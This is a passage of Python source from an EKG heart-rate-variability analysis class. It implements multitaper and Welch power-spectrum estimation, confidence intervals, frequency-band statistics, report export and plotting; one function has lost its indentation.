    Expectation Maximization.

    Parameters
    ----------
    NN_intervals_interpolated : np.ndarray
        The interpolated inter heart beat interval time series, shape (K, 1).
    N : int
        Total number of frequency bins.
    NW : int
        Time half bandwidth of multitapering.
    no_of_tapers : int
        Number of tapers considered for Multitapering.
    K : int
        Observation duration in samples.
    fs : int
        Desired sampling frequency of the time series in Hz.

    Returns
    -------
    denoised_MT_est : np.ndarray
        Denoised multitaper estimate of the Power Spectral Density, shape (N,).
    denoised_w_est_tapers : np.ndarray
        Real and imaginary components of the denoised Eigen-coefficients for
        each taper, shape (2N-1, no_of_tapers).

    Modifies
    --------
    self.psd_mt_denoised : dict with keys
        'freqs' : np.ndarray of bin frequencies (Hz)
        'pwr' : np.ndarray power spectral density (V^2/Hz; 10log10 for dB)
    self.metadata : records 'denoised multitaper' as the psd method.

    See Also
    --------
    EKG.data_pre_processing : Interpolate and zero-center the NN time series.
    EKG.direct_MT_Spectral_Estimation : Classical multitaper PSD estimate.
    EKG.plot_estimates : Plot the final PSD estimates with confidence levels.
    EKG.generate_PS : Generate power spectrum with desired confidence levels.
    """
    # Initializing the parameters
    iter_EM = 50  # Maximum EM iterations
    Q_initial_factor = 10**(5)  # Initialization of Q (state/prior covariance scale)
    sigma_observation = 1*10**(4)  # Initialization of observation noise variance
    Sequences = sp.signal.windows.dpss(K, NW, Kmax=no_of_tapers)  # DPSS data tapers used for multitapering
    self.metadata['analysis_info']['psd_method'] = 'denoised multitaper'
    # Construct the inverse FFT matrix A (K x 2N): columns alternate
    # cosine/negative-sine basis vectors, so A maps stacked (real, imag)
    # Eigen-coefficients back to the time domain.
    A=np.zeros((K,2*N))
    for k in range(0,K):
        for n in range(0,N):
            A[k,2*n] = np.cos((k+1)*np.pi*(n)/N)
            A[k,2*n+1] = -np.sin((k+1)*np.pi*(n)/N)
    A= A/N
    # Drop the imaginary column of the DC bin (always zero) -> 2N-1 columns
    A = np.delete(A, 1, 1)
    denoised_MT_est_tapers = np.zeros((N, no_of_tapers))  # Stores the denoised Eigen spectra for each taper
    denoised_w_est_tapers = np.zeros(((2*N - 1),no_of_tapers))  # Stores the denoised Eigen coefficients for each taper
    # Derive the denoised Eigen coefficients for each taper using Expectation Maximization
    for taper in range(0,no_of_tapers):
        print("Estimating denoised Eigen-coefficients for taper", taper+1)
        Q = Q_initial_factor*np.eye((2*N - 1))  # Initialize the Q matrix
        taper_sequence = Sequences[taper,:]
        taper_sequence = taper_sequence.reshape((K,1))
        tapered_NN_intervals = taper_sequence*NN_intervals_interpolated  # Obtain the tapered time series
        tapered_NN_intervals = tapered_NN_intervals.reshape((K,1))
        w_est = np.zeros((2*N-1, 1))
        P_est = np.zeros((2*N-1, 2*N-1))
        # Small diagonal regularizer keeps the matrix inversions well-conditioned
        regularizer = (10**(-10))*np.eye((2*N-1))
        # Expectation Maximization
        for r in range(0,iter_EM):
            # Expectation step (E - step)
            # NOTE(review): after the first M-step sigma_observation becomes a
            # 1x1 array; the scalar-style arithmetic below relies on numpy
            # broadcasting — confirm intended.
            w_est = np.linalg.inv(regularizer+A.T@A + np.linalg.inv(regularizer+Q)*sigma_observation)@(A.T@tapered_NN_intervals)  # Update the expected value of the denoised Eigen coefficients
            P_est = ((np.linalg.inv(regularizer+A.T@A/(regularizer[0,0]+sigma_observation) + np.linalg.inv(regularizer+Q))))  # Update the covariance of the denoised Eigen coefficients
            # Maximization (M - step)
            Q = np.diag(np.diag(P_est + w_est@w_est.T))  # Update the Q matrix (diagonal second moment)
            sigma_observation = (tapered_NN_intervals.T@tapered_NN_intervals - 2*tapered_NN_intervals.T@A@w_est + np.trace((A.T)@(A)@(P_est + w_est@w_est.T)))/K  # Update the observation noise variance
        # Store estimated denoised Eigen coefficients for this taper
        denoised_w_est_tapers[:,taper] = w_est[:,0]
        # Derive and store the denoised Eigen spectra: DC bin from the first
        # diagonal entry, bin n from the (real^2 + imag^2) diagonal pair
        final_eigen_spectra = w_est@w_est.T
        denoised_MT_est_tapers[0,taper] = final_eigen_spectra[0,0]
        for n in range(1,N):
            denoised_MT_est_tapers[n,taper] = final_eigen_spectra[2*n-1,2*n-1] + final_eigen_spectra[2*n,2*n]
    # The final multi-taper estimate is the average spectral estimate across all tapers
    denoised_MT_est = np.squeeze(np.mean(np.absolute(denoised_MT_est_tapers), axis=1, keepdims = True))
    freq_vector = np.arange(0.0, 0.5*fs, 0.5*fs/N)
    self.psd_mt_denoised = {'freqs': freq_vector, 'pwr': denoised_MT_est}
    return denoised_MT_est, denoised_w_est_tapers
def direct_MT_Spectral_Estimation(self, NN_intervals_interpolated, N, NW, no_of_tapers, fs):
    """
    Produce the classical multitaper estimate of the Power Spectral Density.

    Parameters
    ----------
    NN_intervals_interpolated : np.ndarray
        The interpolated inter heart beat interval time series, shape (K, 1).
    N : int
        Total number of frequency bins.
    NW : int
        Time half bandwidth of multitapering.
    no_of_tapers : int
        Number of tapers considered for Multitapering.
    fs : int
        Desired sampling frequency of the time series in Hz.

    Returns
    -------
    direct_MT_est : np.ndarray
        The classical multitaper estimate of the Power Spectral Density,
        shape (N, 1).
    direct_w_est_tapers : np.ndarray
        The real and imaginary components of the Eigen-coefficients for each
        taper, shape (2N-1, no_of_tapers).

    Modifies
    --------
    self.psd_mt_direct : dict with keys
        'freqs' : np.ndarray of bin frequencies (Hz)
        'pwr' : np.ndarray power spectral density (V^2/Hz; 10log10 for dB)
    self.metadata : records 'direct multitaper' as the psd method.

    See Also
    --------
    EKG.data_pre_processing : Interpolate and zero-center the NN time series.
    EKG.denoised_mt_spectral_estimation : EM-denoised multitaper estimate.
    EKG.plot_estimates : Plot the final PSD estimates with confidence levels.
    EKG.generate_PS : Generate power spectrum with desired confidence levels.
    EKG.confidence_intervals_bootstrapping : Bootstrap confidence bounds.
    EKG.Confidence_intervals_chi_squared : Chi-squared confidence bounds.
    """
    # Initializing variables
    K = NN_intervals_interpolated.shape[0]  # Observation duration in samples
    Fourier_est = np.zeros((2*N, no_of_tapers),dtype=complex)  # Eigen spectra (complex FFT per taper)
    direct_MT_est_tapers = np.zeros((2*N,no_of_tapers))  # Per-taper eigenspectral power
    direct_w_est_tapers = np.zeros((2*N-1,no_of_tapers))  # Real/imaginary Eigen-coefficient components per taper
    dpss_seq = sp.signal.windows.dpss(K, NW, Kmax=no_of_tapers)  # DPSS data tapers used for multitapering
    self.metadata['analysis_info']['psd_method'] = 'direct multitaper'
    # Compute the Eigen-coefficients and the Eigenspectra for each taper
    for taper in range(0,no_of_tapers):
        temp = NN_intervals_interpolated.T*dpss_seq[taper,:]
        Fourier_est[:, taper] = ((np.fft.fft(temp, n = 2*N)).T).reshape((2*N,))  # Eigen-coefficients of the tapered process
        # Pack coefficients as [dc, re(1), im(1), re(2), im(2), ...]
        direct_w_est_tapers[0,taper] = np.absolute(Fourier_est[0,taper])  # dc component
        direct_w_est_tapers[1:2*N-1:2,taper] = np.real(Fourier_est[1:N,taper])  # real components
        direct_w_est_tapers[2:2*N-1:2,taper] = np.imag(Fourier_est[1:N,taper])  # imaginary components
        direct_MT_est_tapers[:,taper] = (np.absolute(Fourier_est[:, taper]))**2  # Eigenspectral estimates
    # The final multi-taper estimate is the average over tapers of the first
    # N (non-negative frequency) bins
    direct_MT_est = np.mean(direct_MT_est_tapers[0:N,:], axis=1, keepdims = True)
    freq_vector = np.arange(0.0, 0.5*fs, 0.5*fs/N)
    self.psd_mt_direct = {'freqs': freq_vector, 'pwr': direct_MT_est}
    return direct_MT_est, direct_w_est_tapers
def confidence_intervals_bootstrapping(self, MT_est, w_est_tapers, CI, bootstrapping_repeats, fs, K, N):
"""
Perform bootstrapping to derive confidence bounds.
Kim et al.,2018
A Multitaper Frequency-Domain Bootstrap Method
In: IEEE Signal Processing Letters
SPL-25.12 (2018), pp. 1805–1809.
Parameters
----------
MT_est : np.ndarray
Multitaper estimate of the Power Spectral Density
w_est_tapers : np.ndarray
Real and imaginery components of the Eigen coefficients of each taper
CI : int
Desired confidence bounds
bootstrapping_repeats : int
Number of bootstrap repeats
fs : int
Sampling frequency
K : int
Observation duration in samples
Returns
-------
Lower_confidence_PSD : np.ndarray
The lower confidence bound of the multi-taper spectral estimates
Upper_confidence_PSD : np.ndarray
The upper confidence bound of the multi-taper spectral estimates
See Also
--------
EKG.denoised_MT_Spectral_Estimation : Peform expectation maximization to estimate the denoised Eigen coefficients and denoised Multitaper spectral estimates.
EKG.direct_MT_Spectral_Estimation : Produce the classical multitaper estimate of the Power Spectral Density.
EKG.plot_estimates : Plot the final PSD estimates with the confidence levels
EKG.generate_PS : Generate power spectrum with desired confidence levels.
EKG.confidence_intervals_chi_squared : Derive confidence bounds based on the Chi-squared approximation
"""
self.metadata['analysis_info']['confidence_intervals'] = 'bootstrapping'
N = MT_est.shape[0] # Number of frequency bins
scaling_fac = (1/fs)*(K / N) # The scaling factor of the final estimates
no_of_tapers = w_est_tapers.shape[1] # The number of tapers used for multi-tapering
denoised_MT_est_bootstrap = np.zeros((N,bootstrapping_repeats)) # Store bootstrapped MT estimates
# Step 2 (Kim et al., 2018): Scale the Eigen coefficients by the power of the MT estimates
scaled_w_hat = w_est_tapers
scaled_w_hat[0,:] = scaled_w_hat[0,:]/np.sqrt(MT_est[0]/2)
for n in range(0,N-1):
S_fac = np.sqrt(MT_est[n+1]/2)
scaled_w_hat[2*n+1,:] = scaled_w_hat[2*n+1,:] / S_fac
scaled_w_hat[2*n+2,:] = scaled_w_hat[2*n+2,:] / S_fac
# Step 3 (Kim et al., 2018): Standardize the concatanated Eigencoefficients to have zero mean and unit variance
for taper in range(0,no_of_tapers):
temp = scaled_w_hat[:,taper]
scaled_w_hat[:,taper] = [temp - np.mean(temp)]/np.sqrt(np.mean((temp - np.mean(temp))**2))
# Perform the bootstrapping
for i in range(0,bootstrapping_repeats):
denoised_MT_est_bootstrap_taper = np.zeros((N,no_of_tapers)) # Bootstrapped MT estimate for each taper
scaled_w_hat_bootstrap = np.zeros((2*N-1,no_of_tapers)) #. Bootstrapped Eigen coefficients
for n in range(0,scaled_w_hat.shape[0]):
temp = scaled_w_hat[n,:]
bootstrap_order = np.random.randint(no_of_tapers, size=no_of_tapers) # Step 4 (Kim et al., 2018): bootstrapping with replacement
scaled_w_hat_bootstrap[n,:] = temp[bootstrap_order]
# Step 5 (Kim et al., 2018): Re-scale the bootstrapped eigen coefficients
if n == 0:
scaled_w_hat_bootstrap[n,:] = scaled_w_hat_bootstrap[n,:]*np.sqrt(MT_est[0]/2)
else:
scaled_w_hat_bootstrap[n,:] = scaled_w_hat_bootstrap[n,:]*np.sqrt(MT_est[(np.ceil(n/2)).astype(int)]/2)
# Step 6 (Kim et al., 2018): Derive the bootstrapped Eigen spectra for each taper
for taper in range(0,no_of_tapers):
temp = scaled_w_hat_bootstrap[:,taper]
temp = temp.reshape((temp.shape[0],1))
final_eigen_spectra_bootstrap = temp@temp.T
denoised_MT_est_bootstrap_taper[0,taper] = final_eigen_spectra_bootstrap[0,0]
for n in range(0,N-1):
denoised_MT_est_bootstrap_taper[n+1,taper] = final_eigen_spectra_bootstrap[2*n+1,2*n+1]+final_eigen_spectra_bootstrap[2*n+2,2*n+2]
# Derive the bootstrapped Multitaper Spectral Estimates
temp = scaling_fac*np.mean(np.absolute(denoised_MT_est_bootstrap_taper), axis=1, keepdims = True)
denoised_MT_est_bootstrap[:,i] = temp.reshape((temp.shape[0],))
# Specify the lower and upper percentiles based on the desired Confidence Intervals
lower_percentile = (np.floor(((1-CI)/2)*bootstrapping_repeats)).astype(int)
upper_percentile = (np.ceil(((1+CI)/2)*bootstrapping_repeats)).astype(int)
Upper_confidence_PSD = np.zeros((N,1))
Lower_confidence_PSD = np.zeros((N,1))
# Derive the confidence bounds using the upper and lower percentiles
for n in range(0,N):
temp = np.sort(denoised_MT_est_bootstrap[n,:])
Lower_confidence_PSD[n] = temp[lower_percentile]
Upper_confidence_PSD[n] = temp[upper_percentile]
return Lower_confidence_PSD.reshape((N,)), Upper_confidence_PSD.reshape((N,))
def Confidence_intervals_chi_squared(self, MT_est, CI, no_of_tapers, N):
    """
    Derive confidence bounds for the multitaper PSD via the chi-squared
    approximation.

    Percival & Walden, 1993, "Spectral Analysis for Physical Applications",
    pp. 255 & 343.

    Parameters
    ----------
    MT_est : np.ndarray
        Multitaper estimate of the Power Spectral Density.
    CI : float
        Desired confidence level (e.g. 0.95).
    no_of_tapers : int
        Number of tapers used for multitapering.
    N : int
        Number of frequency bins (length of the returned bounds).

    Returns
    -------
    Lower_confidence_PSD : np.ndarray
        Lower confidence bound of the multitaper estimates, shape (N,).
    Upper_confidence_PSD : np.ndarray
        Upper confidence bound of the multitaper estimates, shape (N,).

    See Also
    --------
    EKG.denoised_mt_spectral_estimation : EM-denoised multitaper estimate.
    EKG.direct_MT_Spectral_Estimation : Classical multitaper PSD estimate.
    EKG.confidence_intervals_bootstrapping : Bootstrap confidence bounds.
    EKG.generate_PS : Generate power spectrum with desired confidence levels.
    """
    self.metadata['analysis_info']['confidence_intervals'] = 'chi_sq'
    # degrees of freedom = twice the number of tapers used in multi-tapering
    dof = 2 * no_of_tapers
    # the upper chi-squared quantile yields the LOWER bound and vice versa
    upper_quantile = chi2.ppf((1 + CI) / 2, df=dof)
    lower_quantile = chi2.ppf((1 - CI) / 2, df=dof)
    Lower_confidence_PSD = (dof / upper_quantile) * abs(MT_est)
    Upper_confidence_PSD = (dof / lower_quantile) * abs(MT_est)
    return Lower_confidence_PSD.reshape((N,)), Upper_confidence_PSD.reshape((N,))
def plot_estimates(self, MT_PSD_est, Lower_confidence_PSD, Upper_confidence_PSD, fs):
    """
    Create a figure of the PSD estimate with its confidence band.

    Parameters
    ----------
    MT_PSD_est : np.ndarray
        Multitaper estimate of the Power Spectral Density (N bins).
    Lower_confidence_PSD : np.ndarray
        Lower confidence bound of the multitaper spectral estimates.
    Upper_confidence_PSD : np.ndarray
        Upper confidence bound of the multitaper spectral estimates.
    fs : int
        Sampling frequency.

    Returns
    -------
    fig : figure
        Plot of the PSD estimate with confidence levels.

    See Also
    --------
    EKG.generate_PS : Generate power spectrum with desired confidence levels.
    """
    n_bins = MT_PSD_est.shape[0]
    freqs = np.arange(0.0, 0.5 * fs, 0.5 * fs / n_bins)
    ceiling = 20 * 10 ** 4  # vertical extent of the band-edge markers
    fig, ax = plt.subplots(figsize=(15, 3))
    # dashed vertical markers at the VLF/LF/HF band edges
    for edge in (0.04, 0.15, 0.40):
        marker = np.max(freqs[freqs <= edge])
        ax.plot([marker, marker], [0, ceiling], 'b--')
    # PSD estimate with shaded confidence band
    ax.plot(freqs, MT_PSD_est, color="black")
    ax.fill_between(freqs, Lower_confidence_PSD, Upper_confidence_PSD, color='k', alpha=.4)
    plt.xlabel("frequency ($Hz$)")
    plt.ylabel("Power ($ms^2/Hz$)")
    ax.set_xlim(0, 0.4)
    plt.subplots_adjust(bottom=0.15)
    return fig
def calc_psd_welch(self, itype, window):
    """
    Calculate the welch power spectrum of the interpolated tachogram.

    Parameters
    ----------
    itype : str {'rr', 'nn'}
        Interval type used to decide the segmenting threshold.
        'rr' is uncleaned data; 'nn' is normal (cleaned) intervals.
    window : str
        Windowing function; options from scipy.signal.welch
        (wrapper default 'hamming').

    See Also
    --------
    EKG.calc_psd_mt : Calculate multitaper power spectrum.
    """
    self.metadata['analysis_info']['psd_method'] = 'welch'
    self.metadata['analysis_info']['psd_window'] = window

    # choose the interval series
    if itype == 'rr':
        ii = self.rr
    elif itype == 'nn':
        ii = self.nn[~np.isnan(self.nn)]

    # nfft: next power of 2 above len(data), min 256 (MATLAB guidelines)
    nfft = max(256, 2 ** (int(np.log2(len(self.ii_interp))) + 1))
    # segment length depends on total II duration (5 min threshold = 300000 ms)
    total_ms = np.max(np.cumsum(ii))
    nperseg = nfft if total_ms < 300000 else 300
    # default overlap = 50%
    freqs, power = welch(self.ii_interp, fs=4, window=window, scaling='density',
                         nfft=nfft, nperseg=nperseg)
    self.psd_welch = {'freqs': freqs, 'pwr': power, 'nfft': nfft, 'nperseg': nperseg}
def calc_fbands(self, method):
    """
    Calculate frequency band measures from a previously computed power spectrum.

    Parameters
    ----------
    method : str {'welch', 'mt_direct', 'mt_denoised'} or None
        Which stored spectrum to analyze (self.psd_welch, self.psd_mt_direct
        or self.psd_mt_denoised). Prompts interactively when None.

    Raises
    ------
    ValueError
        If method is not one of the recognized options.

    Notes
    -----
    Modified from pyHRV.
    Normalized units are normalized to total lf + hf power, according to
    Heathers et al. (2014).
    """
    if method is None:
        method = input('Please enter PSD method (options: "welch", "mt_direct", "mt_denoised"): ')
    # pick the stored spectrum; the previous if/if/elif chain left `psd`
    # unbound (NameError) for any unrecognized method -- fail explicitly
    if method == 'welch':
        psd = self.psd_welch
    elif method == 'mt_direct':
        psd = self.psd_mt_direct
    elif method == 'mt_denoised':
        psd = self.psd_mt_denoised
    else:
        raise ValueError('Unrecognized PSD method: {}. Options: "welch", "mt_direct", "mt_denoised".'.format(method))
    # set frequency bands (Hz); ulf is undefined for short recordings
    ulf = None
    vlf = (0.000, 0.04)
    lf = (0.04, 0.15)
    hf = (0.15, 0.4)
    args = (ulf, vlf, lf, hf)
    names = ('ulf', 'vlf', 'lf', 'hf')
    freq_bands = dict(zip(names, args))
    # get indices and values for frequency bands in calculated spectrum
    fband_vals = {}
    for key in freq_bands.keys():
        fband_vals[key] = {}
        if freq_bands[key] is None:
            fband_vals[key]['idx'] = None
            fband_vals[key]['pwr'] = None
        else:
            # lower limit not inclusive
            fband_vals[key]['idx'] = np.where((freq_bands[key][0] < psd['freqs']) & (psd['freqs'] <= freq_bands[key][1]))[0]
            fband_vals[key]['pwr'] = psd['pwr'][fband_vals[key]['idx']]
    self.psd_fband_vals = fband_vals
    # total power over all defined bands
    total_pwr = sum(filter(None, [np.sum(fband_vals[key]['pwr']) for key in fband_vals.keys()]))
    freq_stats = {'totals':{'total_pwr': total_pwr}}
    # per-band statistics
    for key in freq_bands.keys():
        freq_stats[key] = {}
        freq_stats[key]['freq_range'] = str(freq_bands[key])
        if freq_bands[key] is None:
            freq_stats[key]['pwr_ms2'] = None
            freq_stats[key]['pwr_peak'] = None
            freq_stats[key]['pwr_log'] = None
            freq_stats[key]['pwr_%'] = None
            freq_stats[key]['pwr_nu'] = None
        else:
            freq_stats[key]['pwr_ms2'] = np.sum(fband_vals[key]['pwr'])
            # frequency at which this band's power peaks
            peak_idx = np.where(fband_vals[key]['pwr'] == max(fband_vals[key]['pwr']))[0][0]
            freq_stats[key]['pwr_peak'] = psd['freqs'][fband_vals[key]['idx'][peak_idx]]
            freq_stats[key]['pwr_log'] = np.log(freq_stats[key]['pwr_ms2'])
            freq_stats[key]['pwr_%'] = freq_stats[key]['pwr_ms2']/freq_stats['totals']['total_pwr']*100
    # normalized units for lf & hf (relative to lf+hf power)
    for key in ['lf', 'hf']:
        freq_stats[key]['pwr_nu'] = freq_stats[key]['pwr_ms2']/(freq_stats['lf']['pwr_ms2'] + freq_stats['hf']['pwr_ms2'])*100
    # lf/hf ratio
    freq_stats['totals']['lf/hf'] = freq_stats['lf']['pwr_ms2']/freq_stats['hf']['pwr_ms2']
    self.freq_stats = freq_stats
def calc_fstats(self, itype, method, bandwidth, window):
    """
    Calculate commonly used frequency domain HRV statistics.

    Parameters
    ----------
    itype : str {'rr', 'nn'}
        Interval type. 'rr' is uncleaned data; 'nn' is normal (cleaned)
        intervals.
    method : str, {'mt', 'welch'}
        Method used to compute the power spectrum ('mt' is multitaper).
        NOTE(review): other values (e.g. 'mt_direct'/'mt_denoised') pass
        through without computing a spectrum here and assume one was computed
        beforehand -- confirm against generate_PS.
    bandwidth : float
        Bandwidth for multitaper power spectral estimation.
    window : str
        Window to use for welch FFT.

    See Also
    --------
    EKG.calc_tstats : Calculate commonly used time domain HRV statistics.
    EKG.hrv_stats : Calculate both time and frequency domain HRV statistics.
    """
    # resample & interpolate tachogram
    print('Interpolating and resampling tachogram...')
    self.interpolate_IBI(itype)

    # calculate power spectrum via a small dispatch table
    print('Calculating power spectrum...')
    spectrum_calcs = {'mt': lambda: self.calc_psd_mt(bandwidth),
                      'welch': lambda: self.calc_psd_welch(itype, window)}
    calc = spectrum_calcs.get(method)
    if calc is not None:
        calc()

    # calculate frequency domain statistics
    print('Calculating frequency domain measures...')
    self.calc_fbands(method)
    print('Frequency measures stored in obj.freq_stats\n')
def hrv_stats(self, itype='nn', nn_file=None, method='mt_denoised', bandwidth=0.01, window='hamming'):
    """
    Calculate both time and frequency domain HRV statistics on the IBI object.

    Parameters
    ----------
    itype : str {'nn', 'rr'}
        Interbeat interval type to use. 'rr' is uncleaned data; 'nn' is
        normal (cleaned) intervals.
    nn_file : str, optional
        Path to a csv of previously exported cleaned nn values.
    method : str, {'mt_denoised', 'mt_direct', 'welch'}
        Power spectrum method ('mt' is multitaper).
    bandwidth : float, default 0.01
        Bandwidth for frequency domain statistics.
    window : str, default 'hamming'
        Window type for welch power spectral analysis
        (options from scipy.signal welch).
    """
    self.metadata['analysis_info']['itype'] = itype

    if itype == 'nn' and nn_file is not None:
        # pull cleaning parameters back out of the exported file's two
        # header lines (fixed, position-based format)
        with open(nn_file, 'r') as f:
            header_one = f.readline().split(' ')
            header_two = f.readline().split(' ')
        info = self.metadata['analysis_info']
        info['mw_size'] = float(header_one[6])
        info['upshift'] = float(header_one[10].split('.\n')[0])
        info['artifacts_rmvd'] = int(header_two[5])
        # load nn intervals
        self.nn = np.loadtxt(nn_file)
    else:
        self.metadata['analysis_info']['artifacts_rmvd'] = str(str(len(self.rpeak_artifacts)) + ' false peaks (removed); ' + str(len(self.rpeaks_added)) + ' missed peaks (added); ' + str(len(self.ibi_artifacts)) + ' ibis removed (from NaN data)')
        # fall back to raw rr intervals when no cleaned series exists yet
        if not hasattr(self, 'nn'):
            self.nn = self.rr

    # calculate statistics
    self.calc_tstats(itype)
    self.calc_fstats(itype, method, bandwidth, window)
    print('Done.')
def to_spreadsheet(self, spreadsheet, savedir):
    """
    Append the object's scalar calculations as a row in a master spreadsheet.

    Array-like attributes ('data', 'rpeaks', 'rr', 'rr_diff', 'rr_diffsq',
    'rpeak_artifacts', 'rpeaks_added', 'ibi_artifacts', 'rpeaks_df', 'nn',
    'nn_diff', 'nn_diffsq', 'rr_arts', 'ii_interp', 'psd_mt_direct',
    'psd_mt_denoised', 'psd_welch', 'psd_fband_vals') are excluded.

    Parameters
    ----------
    spreadsheet : str
        Name of output file.
    savedir : str
        Path to directory where the spreadsheet will be saved.

    Notes
    -----
    Creates a new spreadsheet (with header row) if the output file does not
    exist yet.
    """
    # arrays/dataframes are excluded: only nested scalar values go to the sheet
    # (list predates the split into two classes; 'data'/'rpeaks' may be absent)
    excluded = ['data', 'rpeaks', 'rr', 'rr_diff', 'rr_diffsq', 'rpeak_artifacts', 'rpeaks_added', 'ibi_artifacts',
                'rpeaks_df', 'nn', 'nn_diff', 'nn_diffsq', 'rr_arts', 'ii_interp', 'psd_mt_direct', 'psd_mt_denoised', 'psd_welch', 'psd_fband_vals']
    data = {attr: val for attr, val in vars(self).items() if attr not in excluded}

    # flatten the three-level nested dict into (l1, l2, l3) column tuples
    flattened = {(level1_key, level2_key, level3_key): values
                 for level1_key, level2_dict in data.items()
                 for level2_key, level3_dict in level2_dict.items()
                 for level3_key, values in level3_dict.items()}

    df = pd.DataFrame(flattened, index=[0])
    df.set_index([('metadata', 'file_info', 'in_num'), ('metadata', 'file_info', 'start_time')], inplace=True)

    savename = os.path.join(savedir, spreadsheet)
    already_there = os.path.exists(savename)
    # append mode either way; only a brand-new file gets a header row
    with open(savename, 'a') as f:
        df.to_csv(f, header=not already_there, line_terminator='\n')
    if already_there:
        print('Data added to {}'.format(spreadsheet))
    else:
        print('{} does not exist. Data saved to new spreadsheet'.format(spreadsheet))
def _resolve_report_dir(self, savedir):
    """Resolve the report output directory, interactively when none is given.
    Returns the directory path, or None if the user aborted."""
    if savedir is None:
        savedir = os.getcwd()
        chngdir = input('Files will be saved to ' + savedir + '. Change save directory? [Y/N] ')
        if chngdir == 'Y':
            savedir = input('New save directory: ')
            if not os.path.exists(savedir):
                createdir = input(savedir + ' does not exist. Create directory? [Y/N] ')
                if createdir == 'Y':
                    os.makedirs(savedir)
                else:
                    savedir = input('Try again. Save directory: ')
                    if not os.path.exists(savedir):
                        print(savedir + ' does not exist. Aborting. ')
                        return None
    elif not os.path.exists(savedir):
        print(savedir + ' does not exist. Creating directory...')
        os.makedirs(savedir)
    else:
        print('Files will be saved to ' + savedir)
    return savedir

def _write_txt_report(self, data, file):
    """Write the (up to three levels) nested stats dict as an indented
    plain-text report."""
    with open(file, 'w') as f:
        for k, v in data.items():
            if type(v) is not dict:
                f.write(k + ' ' + str(v) + '\n')
            else:
                f.write(k + '\n')
                for kx, vx in v.items():
                    if type(vx) is not dict:
                        f.write('\t' + kx + ' ' + str(vx) + '\n')
                    else:
                        f.write('\t' + kx + '\n')
                        for kxx, vxx in vx.items():
                            f.write('\t\t' + kxx + ' ' + str(vxx) + '\n')

def _export_psds(self, savedir, saveinfo):
    """Export any computed power spectra as csv files for later plotting."""
    for attr in ('psd_mt_denoised', 'psd_mt_direct', 'psd_welch'):
        try:
            psd = getattr(self, attr)
        except AttributeError:
            continue
        psdfile = os.path.join(savedir, saveinfo + '_' + attr + '.txt')
        pd.DataFrame(psd).to_csv(psdfile, index=False)

def to_report(self, savedir=None, fmt='txt'):
    """
    Export HRV statistics as a text or json report, plus csv power spectra.

    Parameters
    ----------
    savedir : str, optional
        Path to directory in which to save the report. Prompts interactively
        when omitted; created if it does not exist.
    fmt : str, {'txt', 'json'}
        Output format for the statistics report.

    See Also
    --------
    EKG.hrv_stats : Calculate both time and frequency domain HRV statistics.
    EKG.calc_fstats : Calculate commonly used frequency domain HRV statistics.
    EKG.calc_tstats : Calculate commonly used time domain HRV statistics.
    EKG.denoised_mt_spectral_estimation : EM-denoised multitaper estimate.
    EKG.direct_MT_Spectral_Estimation : Classical multitaper PSD estimate.
    """
    savedir = self._resolve_report_dir(savedir)
    if savedir is None:
        return

    # export everything that isn't a dataframe, series, or array.
    # 'psd_welch' is now excluded too (consistent with to_spreadsheet):
    # its ndarrays are not json-serializable and are exported separately below
    arrays = ['data', 'rpeaks', 'rr', 'rr_diff', 'rr_diffsq', 'rpeak_artifacts', 'rpeaks_added', 'ibi_artifacts', 'rpeaks_df', 'nn', 'nn_diff', 'nn_diffsq', 'rr_arts', 'ii_interp', 'psd_mt_direct', 'psd_mt_denoised', 'psd_welch', 'psd_fband_vals']
    data = {k: v for k, v in vars(self).items() if k not in arrays}

    # filename stem: epoched files keep one extra underscore-delimited token
    if 'epoch' in self.metadata['file_info'].keys():
        saveinfo = ('_'.join((self.metadata['file_info']['fname'].split('_')[:6]))).split('.')[0]
    else:
        saveinfo = ('_'.join((self.metadata['file_info']['fname'].split('_')[:5]))).split('.')[0]

    # save calculations
    if fmt == 'txt':
        self._write_txt_report(data, os.path.join(savedir, saveinfo + '_HRVstats.txt'))
    elif fmt == 'json':
        with open(os.path.join(savedir, saveinfo + '_HRVstats_json.txt'), 'w') as f:
            json.dump(data, f, indent=4)

    # save power spectra for later plotting
    self._export_psds(savedir, saveinfo)
# plotting methods
def plotpeaks(self, rpeaks=True, ibi=True, thres = True):
    """
    Plot EKG class instance.

    Visualization of raw EKG data, smoothed EKG data, R peaks, IBI length
    and EKG threshold detection line.

    Parameters
    ----------
    rpeaks : bool, default True
        Shows r peaks on plot if set to True.
    ibi : bool, default True
        Displays a second panel with the IBI time leading up to each r peak
        if set to True.
    thres : bool, default True
        Shows threshold line if set to True (plots the full self.data frame,
        which is assumed to include the threshold column).
    """
    # set number of panels and choose which columns to plot.
    # NOTE(review): when thres is True the whole self.data frame is plotted,
    # presumably including a threshold column -- confirm against the
    # detection code that builds self.data.
    if ibi == True:
        plots = ['ekg', 'ibi']
        if thres == True:
            data = [self.data, self.rpeaks_df['ibi_ms']]
        if thres == False:
            # without the threshold, plot raw (and smoothed, if computed) only
            if self.metadata['analysis_info']['smooth'] == False:
                data = [self.data['Raw'], self.rpeaks_df['ibi_ms']]
            if self.metadata['analysis_info']['smooth'] == True:
                data = [self.data[['Raw', 'raw_smooth']], self.rpeaks_df['ibi_ms']]
    else:
        plots = ['ekg']
        if thres == True:
            data = [self.data]
        if thres == False:
            if self.metadata['analysis_info']['smooth'] == False:
                data = [self.data['Raw']]
            if self.metadata['analysis_info']['smooth'] == True:
                data = [self.data[['Raw', 'raw_smooth']]]

    fig, axs = plt.subplots(len(plots), 1, sharex=True, figsize = [9.5, 6])

    if len(plots) > 1:
        # two panels: EKG trace on top, IBI series below
        for dat, ax, plot in zip(data, axs, plots):
            if plot == 'ekg' and rpeaks == True:
                ax.plot(dat, zorder = 1)
                ax.scatter(self.rpeaks.index, self.rpeaks.values, color='red', zorder = 2)
                ax.set_ylabel('EKG (mV)')
                # legend labels depend on which artists were drawn above,
                # in creation order
                if self.metadata['analysis_info']['pan_tompkins'] == True:
                    ax.legend(('raw data', 'rpeak'), fontsize = 'small')
                else:
                    if thres == True:
                        if self.metadata['analysis_info']['smooth'] == True:
                            ax.legend(('raw data', 'threshold line', 'smoothed data', 'rpeak'), fontsize = 'small')
                        else:
                            ax.legend(('raw data', 'threshold line', 'rpeak'), fontsize = 'small')
                    else:
                        if self.metadata['analysis_info']['smooth'] == True:
                            ax.legend(('raw data', 'smoothed data', 'rpeak'), fontsize = 'small')
                        else:
                            ax.legend(('raw data', 'rpeak'), fontsize = 'small')
            elif plot == 'ibi':
                ax.plot(dat, color='grey', marker='.', markersize=8, markerfacecolor=(0, 0, 0, 0.8), markeredgecolor='None')
                ax.set_ylabel('Inter-beat interval (ms)')
                ax.set_xlabel('Time')
